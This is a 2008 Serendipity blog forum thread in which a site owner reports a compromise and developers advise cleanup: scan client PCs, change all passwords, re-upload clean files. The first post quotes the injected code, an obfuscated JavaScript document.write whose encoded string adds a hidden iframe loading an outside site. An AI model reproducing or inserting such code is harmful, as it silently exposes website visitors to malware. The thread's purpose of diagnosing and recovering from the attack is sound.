Site got code injected in.... RSS Feed not working

Random stuff about serendipity. Discussion, Questions, Paraphernalia.
Post Reply
Andyman77
Regular
Posts: 92
Joined: Mon Oct 17, 2005 2:50 pm
Location: London
Contact:

Site got code injected in.... RSS Feed not working

Post by Andyman77 » Sat Dec 20, 2008 4:10 am

OK have cleaned up all the files, I believe I have rather.

I had a lot of files with the following code appended to the end of them,

Index.php got hit several times even with file permission going at 644!?

Several other files also got hit.

Code: Select all

# <!-- o --><Script Language='Javascript'>
# <!-- HTML Encryption provided by iWEBTOOL.com -->
# <!--
# document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%6C%65%63%68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
# //-->
# </Script><!-- c -->



My RSS feed is now not working... as the code has managed to get into it. You can see it at the URL below.

http://feedvalidator.org/check.cgi?url= ... index.rss2

I would love to know how to clear that one up? as I can't find it in any of the files, and have I looked.

thank you in advance,

Andy
Serendipity - Site, finished ;)
Mine that is ... so lots of nonsensical Stuff

User avatar
garvinhicking
Core Developer
Posts: 30020
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Re: Site got code injected in.... RSS Feed not working

Post by garvinhicking » Sat Dec 20, 2008 3:49 pm

Hi!

This is a common hack of a trojan that has your FTP account data. One of your PCs you used FTP to your site most problably was infected.

First you need to scan all client PCs that had access to your site for that trojan/backdor and remove it. only after that you should change all passwords (Mysql, FTP, blog, Mail, ...), and then upload a fresh, unmodified serendipity release version over your blog.

Also delete all files iny our templates_c directory.

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/

Andyman77
Regular
Posts: 92
Joined: Mon Oct 17, 2005 2:50 pm
Location: London
Contact:

Post by Andyman77 » Sat Jan 03, 2009 6:07 pm

Hi,

Firstly, Happy New Year and thanks for S9y 1.4.

I had a huge problem with my host, multiple sites got infected with malware, all but 1 of the sites are now clean.

However, my home page is now backup and working and clean.

I was just thinking with S9y 1.4 with it's version checking. Is there a way one can encrypt/compress the main core code of s9y so that there is no way for someone to be able to view the source code ?

Just wondering.

regards,

Andy
Serendipity - Site, finished ;)
Mine that is ... so lots of nonsensical Stuff

User avatar
kleinerChemiker
Regular
Posts: 765
Joined: Tue Oct 17, 2006 2:36 pm
Location: Vienna/Austria
Contact:

Post by kleinerChemiker » Sat Jan 03, 2009 7:44 pm

it is possible to "compile" php-code. but s9y is opensource, so even than you could download the uncompiled code and read it. and of course, security by obscurity is a very bad way to enhance security. look at windows, without sourcecode, there is enough maleware that takes advantage of bugs in the code.

Andyman77
Regular
Posts: 92
Joined: Mon Oct 17, 2005 2:50 pm
Location: London
Contact:

Post by Andyman77 » Sat Jan 03, 2009 7:49 pm

You are correct there. Just an Idea, spawn through the madness of 2 weeks of intense problems with my hosting company and my websites.


:roll:
Serendipity - Site, finished ;)
Mine that is ... so lots of nonsensical Stuff

User avatar
garvinhicking
Core Developer
Posts: 30020
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:

Post by garvinhicking » Sat Jan 03, 2009 11:03 pm

Hi!

Andyman77 wrote:You are correct there. Just an Idea, spawn through the madness of 2 weeks of intense problems with my hosting company and my websites.


You did, like I mentioned, SCAN ALL YOUR PCs? Your recent trouble VERY MUCH emphasizes that one of your PCs might be infected, and that you might go through the same problems again in a few days.

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/

Andyman77
Regular
Posts: 92
Joined: Mon Oct 17, 2005 2:50 pm
Location: London
Contact:

Post by Andyman77 » Sun Jan 04, 2009 4:29 am

Hi Garvin,

Yep, I am using Eset, Smart Security, did multiple Deep scans and found nothing. I changed all my passwords. Using Keepass as a generator.

I did find later that there was a 'hidden' FTP account on my hosting server. No idea how that happened.

All appears to be OK now.
Serendipity - Site, finished ;)
Mine that is ... so lots of nonsensical Stuff

Post Reply